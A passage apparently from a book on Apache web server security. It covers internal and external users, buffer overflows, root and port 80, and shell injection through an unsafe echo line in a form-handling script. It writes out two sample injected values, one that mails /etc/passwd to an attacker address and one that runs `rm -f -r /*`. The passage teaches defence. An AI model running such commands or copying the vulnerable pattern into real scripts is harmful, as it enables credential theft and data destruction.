As we have said, most serious operating systems, including Unix, provide security by limiting the ability of each user to perform certain operations. The exact details are unimportant, but when we apply this principle to a web server, we clearly have to decide who the users of the web server are with respect to the security of our network sheltering behind it. When considering a web server’s security, we must recognize that there are essentially two kinds of users: internal and external.
The internal users are those within the organization that owns the server (or, at least, the users the owners wish to update server content); the external ones inhabit the rest of the Internet. Of course, there are many levels of granularity below this one, but here we are trying to capture the difference between users who are supposed to use the HTTP server only to browse pages (the external users) and users who may be permitted greater access to the web server (the internal users).
We need to consider security for both of these groups, but the external users are more worrisome and have to be more strictly controlled. It is not that the internal users are necessarily nicer people or less likely to get up to mischief. In some ways, they are more likely to create trouble, having motive and knowledge, but, to put it bluntly, we know (mostly) who signs their paychecks and where they live. The external users are usually beyond our vengeance.
In essence, by connecting to the Internet, we allow anyone in the world to become an external user and type anything she likes on our server’s keyboard. This is an alarming thought: we want to allow them to do a very small range of safe things and to make sure that they cannot do anything outside that range. This desire has a couple of implications:
External users should only have to access those files and programs we have specified and no others.
The server should not be vulnerable to sneaky attacks, like asking for a page with a 1 MB name (the Bad Guy hopes that a name that long might overflow a fixed-length buffer and trash the stack) or with funny characters (like !, #, or /) included in the page name that might cause part of it to be construed as a command by the server’s operating system, and so on. These scenarios can be avoided only by careful programming. Apache’s approach to the first problem is to avoid using fixed-size buffers for anything but fixed-size data;[1] it sounds simple, but really it costs a lot of painstaking work. The other problems are dealt with case by case, sometimes after a security breach has been identified, but most often just by careful thought on the part of Apache’s coders.
Unfortunately, Unix works against us. First, the standard HTTP port is 80. Only the superuser can attach to this port (this is an historical attempt at security appropriate for machines with untrusted users with logins — not a situation any modern secure web server should be in), so the server must at least start up as the superuser: this is exactly what we do not want.[2]
Another problem is that the various shells used by Unix have a rich syntax, full of clever tricks that the Bad Guy may be able to exploit to do things we don’t expect. Win32 is by no means immune to these problems either, as the only shell it provides (COMMAND.COM ) is so lacking in power that Unix shells are sometimes used in its place.
For example, we might have sent a form to the user in an HTML document. His computer interprets the script and puts the form up on his screen. He fills in the form and hits the Submit button. His machine then sends it back to our server, where it invokes a URL with the contents of the form tacked on the end. We have set up our server so that this URL runs a script that appends the contents of the form to a file we can look at later. Part of the script might be the following line:
echo "You have sent the following message: $MESSAGE"
The intention is that our machine should return a confirmatory
message to the user, quoting whatever he said to us in the text
string $MESSAGE
.
Now, if the external user is a cunning and bad person, he may send us
the $MESSAGE
:
`mail wolf@lair.com < /etc/passwd`
Since backquotes are interpreted by the shell as enclosing commands, this has the alarming effect of sending our top-secret password file to this complete stranger. Or, with less imagination but equal malice, he might simply have sent us:
`rm -f -r /*`
which amusingly licks our hard disk as clean as a wolf ’s dinner plate.